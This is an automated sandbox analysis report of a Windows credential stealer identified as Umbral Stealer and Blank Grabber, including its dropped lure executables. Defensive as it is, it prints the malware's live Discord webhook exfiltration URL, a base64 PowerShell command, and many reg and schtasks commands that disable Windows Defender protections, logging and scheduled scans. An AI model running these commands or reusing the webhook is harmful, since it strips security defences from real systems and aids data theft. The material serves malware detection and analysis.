Windows Analysis Report
wKj1CBkbos.exe

Overview

General Information

Sample name: wKj1CBkbos.exe
renamed because original name is a hash value
Original sample name: E3A480A53D8B2C398A7642E1F4E84785.exe
Analysis ID: 1545326
MD5: e3a480a53d8b2c398a7642e1f4e84785
SHA1: 7f8fa5e3dc9be9055f9202213be33460a1af1e09
SHA256: 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2
Tags: DCRatexeuser-abuse_ch
Infos:

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Umbral Stealer
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates files with lurking names (e.g. Crack.exe)
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Disable Important Scheduled Task
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: wKj1CBkbos.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Found malware configuration
Source: wKj1CBkbos.exe Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA ", "Version": "v1.3"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe ReversingLabs: Detection: 92%
Multi AV Scanner detection for submitted file
Source: wKj1CBkbos.exe ReversingLabs: Detection: 95%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: wKj1CBkbos.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: wKj1CBkbos.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP5bEhE6DLfJFghJ_KLSRhA
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
May check the online IP address of the machine
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: 52cheatand52rat.exe, 00000002.00000002.2218560821.000001BC1CA1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gstatic.com
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04409000.00000004.00000800.00020000.00000000.sdmp, 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC0437E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 52cheatand52rat.exe.0.dr String found in binary or memory: https://discord.com/api/v10/users/
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/api/webhooks/1266665187293794356/BgUJDQi9QXAA0avjRcAiy-uTUWdbVUSk8SQjon--JNjDxPP
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr String found in binary or memory: https://discordapp.com/api/v9/users/
Source: 52cheatand52rat.exe.0.dr String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gstatic.com
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC04301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gstatic.com/generate_204
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Too many similar processes found
Source: reg.exe Process created: 67

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: wKj1CBkbos.exe, type: SAMPLE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Creates files with lurking names (e.g. Crack.exe)
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Jump to behavior
Detected VMProtect packer
Source: Lunch LaCheat.exe.6.dr Static PE information: .vmp0 and .vmp1 section names
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe 10D28E18A7DF4B2C30E05E5E361F1724E0B6EA8C021D8105EE30354BE79B98D1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe AFE91FEA04D39DE5710AD065252D13B9DF7B7BD25788DDF5AFB162A2F0A03296
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe 2952FA4AB9BC3E2B04B1F3AB6B648D0D23FA74856C50BF21FB13FDDFE9A874BB
PE file contains executable resources (Code or Archives)
Source: wKj1CBkbos.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: wKj1CBkbos.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: Primordial Crack.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Sample file is different than original file name gathered from version info
Source: wKj1CBkbos.exe, 00000000.00000002.2187239818.000000000141E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2143205509.000000000141E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.0000000001432000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2143205509.00000000013E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Source: wKj1CBkbos.exe Binary or memory string: OriginalFilename vs wKj1CBkbos.exe
Uses 32bit PE files
Source: wKj1CBkbos.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Yara signature match
Source: wKj1CBkbos.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 52cheatand52rat.exe.0.dr, --------.cs Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: 52cheatand52rat.exe.0.dr, --------.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 52cheatand52rat.exe.0.dr, --------.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, --------.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@113/6@1/1
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\52cheatand52rat.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Mutant created: \Sessions\1\BaseNamedObjects\kwtxO2R822Z9ihsGdQrR
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: wKj1CBkbos.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wKj1CBkbos.exe ReversingLabs: Detection: 95%
Source: unknown Process created: C:\Users\user\Desktop\wKj1CBkbos.exe "C:\Users\user\Desktop\wKj1CBkbos.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe"
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe"
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe" Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
